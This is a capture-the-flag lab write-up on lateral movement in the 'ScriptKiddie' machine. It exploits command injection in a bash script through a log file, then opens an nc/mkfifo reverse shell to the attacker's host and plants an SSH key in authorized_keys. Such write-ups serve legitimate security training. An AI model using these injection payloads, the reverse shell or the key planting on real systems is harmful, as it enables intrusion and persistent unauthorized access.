InfoSec LAB

ScriptKiddie_Lateral_Movement

Created: 4 min read

pwn

As discovered previously, the bash script located at /home/pwn/scanlosers.sh appears to be vulnerable to OS command injection

kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
#!/bin/bash
 
log=/home/kid/logs/hackers
 
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
 
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

The bash script above

  1. reads from the /home/kid/logs/hackers file
  2. sets up a delimiter of a single whitespace( ) and assigns the 3rd field and the REST(-f3-) to the variable, ip
  3. passes the ip variable to the Nmap command
  4. executes the Nmap command with the privileges of thepwn user (confirmed by PSPY)
kid@scriptkiddie:/home/pwn$ echo 'ignored ignored this is passed' >> /home/kid/logs/hackers

As shown above, this is passed is passed on the Nmap command

Confirmation

kid@scriptkiddie:/home/pwn$ echo 'ignored ignored ; ping 10.10.14.12 -c 2' >> /home/kid/logs/hackers

For further testing, I replaced this is passed with ; ping 10.10.14.12 -c 2

and I got the 2 ping requests on Kali as expected. This confirms the OS command injection vulnerability

Lateral Movement

kid@scriptkiddie:/home/pwn$ echo 'ignored ignored ; mkfifo /tmp/lliis; nc 10.10.14.12 8888 0</tmp/lliis | /bin/sh >/tmp/lliis 2>&1; rm /tmp/lliis' >> /home/kid/logs/hackers

Executing a reverse shell

┌──(kali㉿kali)-[~/archive/htb/labs/scriptkiddie]
└─$ nnc 8888
listening on [any] 8888 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.226] 43466
whoami
pwn
hostname
scriptkiddie
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:84:37 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.226/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:8437/64 scope global dynamic mngtmpaddr 
       valid_lft 86394sec preferred_lft 14394sec
    inet6 fe80::250:56ff:feb9:8437/64 scope link 
       valid_lft forever preferred_lft forever

Lateral Movement made to the pwn user by injecting OS commands into a misconfigured bash script

SSH

pwn@scriptkiddie:~/.ssh$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' >> /home/pwn/.ssh/authorized_keys

Same thing here. I am writing my own SSH key into the SSH file of the pwn user

┌──(kali㉿kali)-[~/archive/htb/labs/scriptkiddie]
└─$ ssh pwn@$IP -i ~/.ssh/id_ed25519
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-65-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Fri Mar 31 11:56:01 UTC 2023
 
  System load:             0.32
  Usage of /:              29.4% of 17.59GB
  Memory usage:            18%
  Swap usage:              0%
  Processes:               264
  Users logged in:         1
  IPv4 address for ens160: 10.10.10.226
  IPv6 address for ens160: dead:beef::250:56ff:feb9:8437
 
 
1 update can be installed immediately.
1 of these updates is a security update.
To see these additional updates run: apt list --upgradable
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
Last login: Thu Jan 28 17:52:15 2021 from 10.10.14.7
pwn@scriptkiddie:~$ whoami
pwn
pwn@scriptkiddie:~$ hostname
scriptkiddie
pwn@scriptkiddie:~$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.226  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:8437  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:8437  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:84:37  txqueuelen 1000  (Ethernet)
        RX packets 26095  bytes 6004708 (6.0 MB)
        RX errors 0  dropped 34  overruns 0  frame 0
        TX packets 20360  bytes 32944365 (32.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 36324  bytes 2564978 (2.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 36324  bytes 2564978 (2.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

There.

Interactive Graph View

Backlinks